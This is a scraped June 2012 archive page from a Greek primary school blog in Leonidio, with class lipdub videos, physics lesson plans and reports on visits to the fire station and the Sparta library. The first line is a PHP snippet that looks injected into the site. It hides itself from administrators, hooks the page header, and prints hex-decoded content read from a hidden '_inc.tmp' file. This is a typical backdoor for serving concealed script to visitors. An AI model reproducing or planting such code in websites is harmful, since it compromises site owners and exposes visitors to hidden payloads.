if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ιούνιος, 2012 |

Monthly Archives: Ιούνιος 2012

ΔΙΔΑΚΤΙΚΟ ΣΕΝΑΡΙΟ

Ολ. Δημ. Σχ. Λεωνιδίου Στ’2 Τάξη 2011-12 Lipdub

We DO NOT own the music in this video.
We DO NOT use it for commercial purposes.
Οι μαθητές του Στ’1 2011 2012 Ολ. Δημ. Σχ. Λεωνιδίου
παρουσιάζουν τους Kosheen vs. Placebo και το τραγούδι
“Hide The Bitter Placebo”.

Ολ. Δημ. Σχ. Λεωνιδίου Στ’1 Τάξη 2011-12 Lipdub

We DO NOT own the music in this video.
We DO NOT use it for commercial purposes.
Οι μαθητές του Στ’1 2011 2012 Ολ. Δημ. Σχ. Λεωνιδίου
παρουσιάζουν τους Black eyed peas και το τραγούδι ” i gotta feeling”.

ΔΙΔΑΚΤΙΚΑ ΣΕΝΑΡΙΑ ΦΥΣΙΚΗΣ

ΔΑΣΚΑΛΑ: ΡΟΥΣΑΛΗ ΕΥΓΕΝΙΑ

ΔΙΔΑΚΤΙΚΑ ΣΕΝΑΡΙΑ ΦΥΣΙΚΗΣ Ε΄ΤΑΞΗ 2011-2012

ΦΕ 4

ΣΕΝΑΡΙΑ…ΣΥΝΕΧΕΙΑ

ΦΕ 5

ΦΕ 6

Λέξεις Κλειδιά σε αναζητήσεις:

ΕΠΙΣΚΕΨΗ Ε’ ΤΑΞΗΣ ΣΤΗΝ ΠΥΡΟΣΒΕΤΙΚΗ

Την Τρίτη 5 Ιουνίου 2012 , Παγκόσμια Ημέρα Προστασίας του Περιβάλλοντος , επέλεξαν οι μαθητές της Ε΄ τάξης του Δημοτικού μας Σχολείου να επισκεφτούν την Πυροσβεστική Υπηρεσία Λεωνιδίου.
Έμαθαν πολλές και χρήσιμες πληροφορίες για τις δασικές και αστικές πυρκαγιές καθώς και τις διασώσεις από πυρκαγιές , σεισμούς , πλημμύρες. Συζήτησαν με ιδιαίτερο ενδιαφέρον για απεγκλωβισμούς από ασανσέρ αλλά και από οχήματα που έχουν τρακάρει .
Ο πυροσβέστης Γιάννης Χείλαρης παρουσίασε στους μαθητές μας όλα τα υλικά που έχουν στη διάθεσή τους προκειμένου να σώζουν ανθρώπινες ζωές αλλά και για να προστατεύουν τους εαυτούς τους και τους συναδέλφους τους. Ακόμη τους έδειξε την θέση όλων αυτών των υλικών μέσα στα οχήματά τους.
Μια πολύ σημαντική στιγμή της παρουσίασης ήταν όταν οι μαθητές βρέθηκαν μπροστά σε τρία τρακαρισμένα επιβατικά αυτοκίνητα. Ο πυροσβέστης με ιδιαίτερη προσοχή έδειξε στα παιδιά τους τρόπους απεγκλωβισμού ατόμων καθώς και τα εργαλεία που μπορεί να χρησιμοποιηθούν.
Οι μαθητές και οι δάσκαλοι της τάξης ευχαριστούν θερμά τον πυροσβέστη Χείλαρη Γιάννη για την ολοκληρωμένη παρουσίαση που μας έκανε, τις χρήσιμες συμβουλές του καθώς και τις πολλές απορίες που μας έλυσε!

ΕΠΙΣΚΕΨΗ ΣΤΗ ΔΗΜΟΣΙΑ ΒΙΒΛΙΟΘΗΚΗ ΣΠΑΡΤΗΣ – ΠΑΡΟΥΣΙΑΣΗ ΑΡΧΕΙΟΥ ΝΙΚΗΦΟΡΟΥ ΒΡΕΤΤΑΚΟΥ

Οι μαθητές της Ε΄ τάξης 2011- 2012 , στα πλαίσια της εκπαιδευτικής εκδρομής με προορισμό «Μυστρά ? Σπάρτη» , επισκέφθηκαν τον αρχαιολογικό χώρο του Μυστρά και το «Μουσείο Ελιάς και Λαδιού». Η ενδιαφέρουσα αυτή μέρα ολοκληρώθηκε με την επίσκεψη στην Δημόσια Κεντρική Βιβλιοθήκη Σπάρτης .
Τα παιδιά αφού ξεναγήθηκαν στους χώρους της Βιβλιοθήκης ? παιδικό τμήμα , αναγνωστήριο , δανειστική βιβλιοθήκη κ. ά ? από τον υπεύθυνο , στη συνέχεια τους έγινε μια σύντομη αλλά πολύ ευχάριστη παρουσίαση του βίου του Νικηφόρου Βρεττάκου.
Ο Λάκωνας ποιητής έχει δωρίσει το αρχείο του στη Βιβλιοθήκη Σπάρτης και έτσι τα παιδιά είχαν την ευκαιρία να μάθουν πολλά για τη ζωή του, τις συνήθειές του , την οικογένειά του. Στη συνέχεια σε μικρές ομάδες πέρασαν στον ειδικά διαμορφωμένο χώρο – σαν το γραφείο του ποιητή ? και είδαν από κοντά προσωπικά του αντικείμενα , χειρόγραφα , βραβεία και πολλές οικογενειακές φωτογραφίες του.
Άλλωστε το 2012 είναι χρονιά αφιερωμένη στον Νικηφόρο Βρεττάκο οπότε με την ευκαιρία της επισκέψεώς μας στη Σπάρτη , θεωρήθηκε απαραίτητη και μεγάλης παιδαγωγικής σημασίας η συμμετοχή μας σε αυτό.

Λέξεις Κλειδιά σε αναζητήσεις:

ΚΑΤΑΣΚΕΥΗ ΑΕΡΟΣΤΑΤΩΝ Ε1′ (2012)